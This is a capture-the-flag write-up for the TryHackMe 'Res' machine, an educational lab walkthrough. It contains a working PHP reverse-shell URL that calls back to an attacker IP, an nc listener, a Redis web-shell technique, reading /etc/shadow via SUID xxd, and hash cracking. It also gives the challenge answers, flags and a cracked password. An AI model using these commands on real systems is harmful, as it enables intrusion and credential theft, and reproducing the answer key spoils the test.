“Hack into a vulnerable database server with an in-memory data-structure in this semi-guided challenge!” — a creator of this machine.
In this machine, there are seven questions to be answered. Through this write-up, I will try to explain step by step how to solve this so-called easy machine.
Enumeration
Using nmap command below, I tried to enumerate the system.
nmap -T4 -v -A -oA res 10.10.254.15I used -T4 because usually in this type of machine there are few open ports so I do not need to make the scan slower to achieve precise results. Also, I used -v to increase verbosity or in non-technical is that I use this when I would like to get more information and -A for giving me other important information such as OS detection, version detection, script scanning, and traceroute.
I like to archive the scan result, therefore I used -oA command. -oA has a function to export the scan result into three formats files which are .nmap, .gnmap, and .xml.
There are two ports open which are 80 and 6379. By gathering this information, we can solve some questions.
Q.1) Scan the machine, how many ports are open?
Answer: 2
Q.2) What’s is the database management system installed on the server?
Answer: redis
Q.3) What port is the database management system running on?
Answer: 6379
Q.4) What’s is the version of management system installed on the server?
Answer: 6.0.7
I actually like TryHackMe machines since its more playable than HackTheBox. What I mean “playable” is that there is hint for people when they get stuck which is very helpful. However TryHackMe has very limited time to run the machine, well it extendable but I always ran out of time and need to start with new IP address which does not look good. So please bare with me if you saw different IP address in the command line below.
The port 80 brought me into apache default page as seen in below.
There is no hidden directory either found in the machine. So I have a positive feeling that the culprit is redis.
By lurking in google, I found two interesting articles about redis exploitation.
https://book.hacktricks.xyz/pentesting/6379-pentesting-redis
https://medium.com/@eDodo90/writeup-hack-the-box-reddish-9f99cec8e1be
Quoted from the second website, It said that I need to use redis-cli since redis-cli can be used to upload a web shell since Redis itself can be exploited to run commands.
Exploitation
Based on screenshot above, config set command actually allows user to change the configuration of Redis in the middle of a session without having to restart the service. While set is to save string value.
So in conclusion with these four commands, we will have cmd.php under Res machine which has capability to execute command line.
We will take advantage of this by inserting php reverse shell.
http://10.10.141.145/cmd.php?cmd=php+-r+%27$sock%3dfsockopen(%2210.11.27.166%22,2222)%3bexec(%22/bin/sh+-i+%3C%263+%3E%263+2%3E%263%22)%3b%27Also before that, we need to prepare our listener. I used nc command as seen in below:
nc -lnvp 2222I logged in as www-data and first thing I did when I finally get shell was looking for the user flag. I used find command to locate the user flag. Usually the user flag is under /home directory.
find / -name user.txt -print 2</dev/null
There it is! And in the same time solved the fifth question on the machine.
Q.5) Compromise the machine and locate user.txt
Answer: thm{red1s_rce_w1thout_credent1als}
Now that we have user flag, our last task probably is that performing privilege escalation to get root flag.
Using sudo-l command is really helpful when you want to escalate your privilege. because using sudo -l, we could know what permission this user had. However sudo is not permitted run by www-data.
So our last hope was finding SUID files to get root flag. Set User ID itself is a privilege that allows users to run a file with the permissions of another user. SUID permissions allow files to run with higher privileges. If we visit the target system as a non-root user and find SUID bit enabled binaries, those files, programs, and commands can run as root.
According to this website, xxd has SUID permission which can be used to escalate our privilege. xxd itself has some function to read files like cat.
So I use it to read /root/root.txt since mostly the root flag saved there.
We actually did not logged in as root but yey we got the root flag!
Q.7) Escalate privileges and obtain root.txt
Answer: thm{xxd_pr1v_escalat1on}
We still have one question left which is the local user account password. We know that the user flag is under /home/vianka directory. So most likely the question is asking for vianka password.
To find vianka password, I used xxd command as seen in below.
xxd /etc/shadow | xxd -r
I saved vianka hash password and throw it to JohnTheRipper.
john hash.txt — wordlist /root/Documents/tools/credential/rockyou.txt
It answer our last question.
Q.6) What is the local user account password?
Answer: beautiful1
